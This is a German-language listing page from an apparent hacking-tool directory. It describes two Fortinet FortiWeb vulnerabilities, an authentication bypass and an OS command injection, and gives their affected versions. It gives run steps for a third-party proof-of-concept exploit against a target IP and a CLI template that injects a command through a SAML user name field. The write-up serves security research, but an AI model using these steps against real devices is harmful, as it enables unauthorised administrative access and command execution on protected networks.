Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
fortinet-fortiweb-cve-2025-64446-58034 — Sicherheitsforschung zu Fortinet FortiWeb-Schwachstellen (CVE-2025-64446, CVE-2025-58034) | Kitploit
Tools/GitHubGitHub/lequoca/fortinet-fortiweb-cve-2025-64446-58034
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHublequoca/fortinet-fortiweb-cve-2025-64446-58034

fortinet-fortiweb-cve-2025-64446-58034

Sicherheitsforschung zu Fortinet FortiWeb-Schwachstellen (CVE-2025-64446, CVE-2025-58034)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
3vor 8 MonatenNoch nicht geprüft

Verständnis der Fortinet FortiWeb-Schwachstellen (CVE-2025-64446, CVE-2025-58034)

1. Überblick

Fortinet FortiWeb ist eine Web Application Firewall (WAF), die in Unternehmensumgebungen weit verbreitet eingesetzt wird, um Webanwendungen vor gängigen Bedrohungen zu schützen.

Da FortiWeb üblicherweise in der zentralen Schutzschicht sitzt, können Schwachstellen im Zusammenhang mit Authentifizierung oder Betriebssystem-Befehlsausführung schwerwiegende Auswirkungen auf die gesamte dahinterliegende Infrastruktur haben. Im Jahr 2025 wurden zwei schwerwiegende Schwachstellen in FortiWeb veröffentlicht:

  • CVE-2025-64446 – Authentifizierungs-Bypass durch Relative Path Traversal

  • CVE-2025-58034 – OS Command Injection im authentifizierten Kontext

  • 2. Überblick über CVE-2025-64446

2.1 Art der Schwachstelle

  • Relative Path Traversal
  • Authentication Bypass

2.2 Ursache der Schwachstelle

CVE-2025-64446 resultiert daraus, dass FortiWeb die Zugriffspfade vor der Anwendung des Authentifizierungsmechanismus nicht streng verarbeitet und prüft.

Im Einzelnen:

  • Zugriffskontrollmechanismus auf Basis logischer Pfadzeichenfolgen
  • Keine vollständige Normalisierung (normalize) des Pfads
  • Ermöglicht die Verwendung relativer Pfade für den Zugriff auf interne Ressourcen

Dieser Fehler führt dazu, dass einige administrative Endpunkte ohne gültige Authentifizierung aufgerufen werden können.

2.3 Sicherheitsauswirkungen

  • Vollständige Umgehung des Authentifizierungsmechanismus
  • Unbefugter Zugriff auf administrative Funktionen
  • Aufhebung des Berechtigungsmodells des Sicherheitsgeräts

2.4 Betroffene Versionen

  • FortiWeb 8.0.0 – 8.0.1
  • FortiWeb 7.6.0 – 7.6.4
  • FortiWeb 7.4.0 – 7.4.9
  • FortiWeb 7.2.0 – 7.2.11
  • FortiWeb 7.0.0 – 7.0.11

3. Überblick über CVE-2025-58034

3.1 Art der Schwachstelle

  • OS Command Injection (CWE-78)

3.2 Ursache der Schwachstelle

CVE-2025-58034 entsteht dadurch, dass FortiWeb Benutzereingaben beim Aufruf von Betriebssystembefehlen unsicher verarbeitet.

Zu den Hauptursachen gehören:

  • Eingabeparameter werden nicht streng überprüft
  • Es fehlt ein Mechanismus zum Filtern oder Escapen von Sonderzeichen
  • Benutzerdaten werden direkt an Systembefehle übergeben

Diese Schwachstelle erfordert einen authentifizierten Kontext, stellt aber aufgrund der Befehlsausführung dennoch ein hohes Risiko dar.

3.3 Sicherheitsauswirkungen

  • Unbeabsichtigte Ausführung von Betriebssystembefehlen
  • Zugriff auf Systemressourcen und deren Manipulation
  • Beeinträchtigung von Integrität und Verfügbarkeit des Geräts

3.4 Betroffene Versionen

  • FortiWeb 8.0.0 – 8.0.1
  • FortiWeb 7.6.0 – 7.6.5
  • FortiWeb 7.4.0 – 7.4.10
  • FortiWeb 7.2.0 – 7.2.11
  • FortiWeb 7.0.0 – 7.0.11

4. Ausnutzung (Verweis auf verfügbaren PoC - CVE-2025-64446)

4.1 Repository klonen (Quellcode auf den Rechner laden)

git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034 cd CVE-2025-64446_CVE-2025-58034

4.2 Einrichten der virtuellen Umgebung (venv)

Die virtuelle Python-Umgebung (venv) dient dazu, eine unabhängige Arbeitsumgebung für jedes Projekt zu erstellen und die Abhängigkeiten vom Haupt-Python-System zu trennen. Dadurch werden Versionskonflikte bei Bibliotheken vermieden, die Stabilität der Arbeitsumgebung gewährleistet und die Auswirkungen auf das System begrenzt.

python3 -m venv venv source venv/bin/activate

4.3 Installieren der Abhängigkeiten:

pip install -r requirements.txt

4.4 Den gesamten Exploit-Prozess ausführen

python exploit.py <target_ip> image image image

5. Ausnutzung von CVE-2025-58034 mithilfe von CLI-Befehlen (ausgeführt über die FortiWeb-Kommandozeile nach der Authentifizierung)

config user saml-user

edit "<YOUR COMMAND>"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

Die Schwachstelle CVE-2025-58034 entsteht dadurch, dass FortiWeb die Eingabedaten in einigen Konfigurationsfeldern nicht streng kontrolliert, insbesondere den Wert, der über den folgenden Befehl übergeben wird: edit "" Problem: Dieser Wert wird als Konfigurationszeichenfolge verarbeitet Anschließend wird er an interne Betriebssystembefehle übergeben Sonderzeichen werden nicht vollständig gefiltert oder escaped Dies führt dazu, dass Konfigurationsdaten die ausgeführten Betriebssystembefehle direkt beeinflussen können, was eine OS Command Injection verursacht.

Tool herunterladen